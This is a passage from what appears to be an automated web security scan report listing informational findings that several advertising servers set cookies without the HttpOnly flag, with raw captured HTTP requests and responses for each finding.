Cookie: a=rQ1Ia8xMj0KaI6M6V7+M3Q; s=1,2*4d9a32eb*X4TKR-a8TD*MbX-VAoK_2NCLHMLyLVahutgcQ==*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4d9a32eb*gNkbP117fj*Xk4nbYfLb776H4OdvScWOgThiQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if
6.29. http://ad.doubleclick.net/adj/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/political

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/wn.loc.wcax/political;sz=850x30;wnsz=85;tile=1;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;apptype=platform;env=production;ord=81143749? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 09 Apr 2011 12:53:17 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 09 Apr 2011 12:38:17 GMT
Expires: Sat, 09 Apr 2011 12:38:17 GMT
Cache-Control: private
Content-Length: 1434

document.write('<!-- Template ID = 8688 Template Name = +WorldNow Pencil Pushdown: Images -->\n\n<!-- Template Id = 8688 Template Name = WorldNow Pencil Pushdown: Images -->\n<DIV align=center><A href
...[SNIP]...
6.30. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid=595414&bimpd=bvq28451foJSYWMGSWpGLm57PuP1ep3e8pYSpjMgXYBgzZsm_MD3Ph0_AT4tfqL1DmeJqXqoXz4419yIOhU5gOeJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-tlTKPEPwzWzLjcG0petCQ0kOZWgcTS_a_4u4oxn8pOmWjHRY6EBGuSwXwHGMEC0xL3dnura1cEVep9swAHPGcQgMIlGKLUwZcdE7RzNOB1XKprf8mRndDhhFf8Sdys88gdgxCVuolRLb7Z-3WuXH2eelAZ6GtOP-ASuDVvjj6Alva3C8QNQcmEuoh5hLm8UhVLPCQNQ1NJ6FtytBorXofoFtBivKRqgKwft45cpCMCxp949Lefsp8QsMgMdbB8_G407eUqjR_zXj68onFm3lvdZYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHHwOWv-gGYK-_EdRAynUJQc9OQ0JCH3IRRC2v9iFYyIGsJ_FzMFXQEDgUfSCtUSLiNCZslCDsmK2JC-xdJmz2cjfYrblFN1Vrq7tHBSJG_h8MbnZNh9bOlTF5VJxTMpf6PQwEcwTA1AnGV4Q2SYTL57oEC7wd4-ropmSQNL3Tn8jt_T370WDWWY1SqEwEJwbhIPZgphozREaBUNGGZK6KHTQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.027583195495811192 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15069%7C15069%7C15069%7C15069%7Cundefined%7C15069; rv=1; uid=4608069584519221037; pf=cu1FbtXKKpFof-hWjfkQRcVIkA_tbns9D4-b88MB0l6CH-nC-kQ69MLaDP7avFRDzd5xTtrRgn51HC41qoSB9_pqNLucEh96CCAoHJ73Ep-dCbxIubA9vJ0TJiztXY_3cxb2oDS_ZBeMeceweOTTRM5O3f8IMqs1jnadlyIx8Ew

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 11 Apr 2011 12:35:43 GMT
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=tmY-x8L_yowSJFqM0vF4Y8CuY9t_hBSzjQil7z33OlYpagDPKKctVczI9DEFcEkPcxpGHxRlubu1xR21Mxu4g-sHDXOosP1lwOMr_-ta2t973bvsD6p3TnXOe8vTPY4VFaT6eTBuV55JRFz8lx3PqdqozOSXNU0m0cAav4sZMCcTY1vGdjvt8S43nB6dS9OmxjcTGL1eKfAUVOMXIUnylA; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: fc=eFAOz3ilQ4gYIBtFIJGWAE5_UN3y883I71mcX_0aEuuubHizRKm2LPdnMwd17GsW3WQO872ou4xvEVRnVXW81PsHnm-jU8W9DeXq1d2r1JKkV1vPzSwkQiZJzLr4lAFo; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: pf=snK9kHUjEl1FaWKxPCEh1sJ8lErb_iSlHvQid9sfqYGDVsdGVkOFL386xes7a4VRH-w_0yHZxr5U-a1ULJAMKQRyElVn9VAUzXky4Bxf5K8hlcBpkm8Sg5-23YdyuJpz9_hZk2y4Lc1tg0PRNwxT__KovNH6HfPSeeybFLsgN_DN9JRYGQVWUbjEaPiKqkBr8AkkycJ0w6q2tbQDIXhSrAgkLZbHfwITF7RboAby-GXjYWEb1kaerphA9cWJarOLh_BwiBS09OfPB0I41L7nq5FuSGZvCDWT_YGlhDw-_9zGhvu2FiJEpdM7zDK0xqeWNUj9wzAaHETIIAZhDZgOW6C-zFUZM9OcnDkQKyl2S7I; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 10051


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
6.31. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?1DcIAFDHGQAvoogAAAAAAGK2IgAAAAAAAgAAAAQAAAAAAP8AAAAHCIuDLQAAAAAAAIEtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABE1BAAAAAAAAIAAgAAAAAAgpVDi2xn8z8AAAAAAAASQK0cWmQ73.k.AAAAAAAAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADRnzl3IDfpCeJpp1AiFaPPhSvxg1SnbSzUHg-6AAAAAA==,http%3A%2F%2Fr.turn.com%2Fr%2Fformclick%2Fid%2FJ81uPvGhVn72wQgAAQIBAA%2Furl%2F%24,http%3A%2F%2Fwww.wcax.com%2Fglobal%2Fstory.asp%3Fs%3D503137,Z%3D468x60%26x%3Dhttp%253A%252F%252Fr%252Eturn%252Ecom%252Fr%252Fformclick%252Fid%252FJ81uPvGhVn72wQgAAQIBAA%252Furl%252F%2524%26s%3D1689424%26_salt%3D2792101757%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26r%3D1,e2f6df20-62a5-11e0-a636-00304862d97c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!$!/cM[!!!!#<uB1*!0Qau!!!!#<tePk"; pv1="b!!!!$!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~"; bh="b!!!!r!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-!!!!#<u7R!!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#aH+!!!!#<u]Bd!#c%+!!!!#<u7R!!#eRM!!!!#<tdei!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#xu[!!!!#<u]Bd!$#r<!!!!#<td)R!$'(]!!!!#<u]Bd"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:44 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0044.rm.ac4
Set-Cookie: ih="b!!!!%!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; path=/; expires=Mon, 08-Apr-2013 12:35:44 GMT
Set-Cookie: vuday1=j5M]9!>zo]2r<p+; path=/; expires=Sun, 10-Apr-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; path=/; expires=Mon, 08-Apr-2013 12:35:44 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 09 Apr 2011 12:35:44 GMT
Pragma: no-cache
Content-Length: 921
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8954415);}
</script><iframe src="htt
...[SNIP]...
6.32. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302543676320&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#d!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pS!!!!#<uwIu!#3pv!!!!$<uwIu!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(V!!!!#<uwIu!#5(X!!!!#<uw3o!#5(Y!!!!#<uwIu!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#5(f!!!!#<uwIu!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<e!!!!#<uwIu!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<i!!!!#<uwIu!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LE!!!!#<uwBu!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; liday1=fh'jT9<=sn$o@U=!4)FW>/M!D; ih="b!!!!,!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!/d<p!!!!#<uwg6!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-_j!!!!#<uw`0!1-ar!!!!#<uwX+!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ"; vuday1=d-=>Rd-=>R!4)FWKw-DF; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:41:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0121.2rm.ac4
Set-Cookie: ih="b!!!!-!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!/d<p!!!!#<uwg6!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-_j!!!!#<uw`0!1-ar!!!!#<uwX+!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ!1bC]!!!!#<uwn<"; path=/; expires=Wed, 10-Apr-2013 17:41:19 GMT
Set-Cookie: vuday1=d-=>Rd-=>R!4)FWKw-DF; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=fh'jTD^$u19<=sn$o@U=!4)FWk`zw_; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 17:41:19 GMT
Pragma: no-cache
Content-Length: 1109
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9041166);}
</script><!--Vendor: Cong
...[SNIP]...
6.33. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?Z=300x250&s=1209091&_salt=1728048475&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540674267&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; ih="b!!!!'!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; vuday1=d-=>R!4)FWjt)Q>; bh="b!!!#d!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pS!!!!#<uwIu!#3pv!!!!$<uwIu!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(V!!!!#<uwIu!#5(X!!!!#<uw3o!#5(Y!!!!#<uwIu!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#5(f!!!!#<uwIu!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<e!!!!#<uwIu!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<i!!!!#<uwIu!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<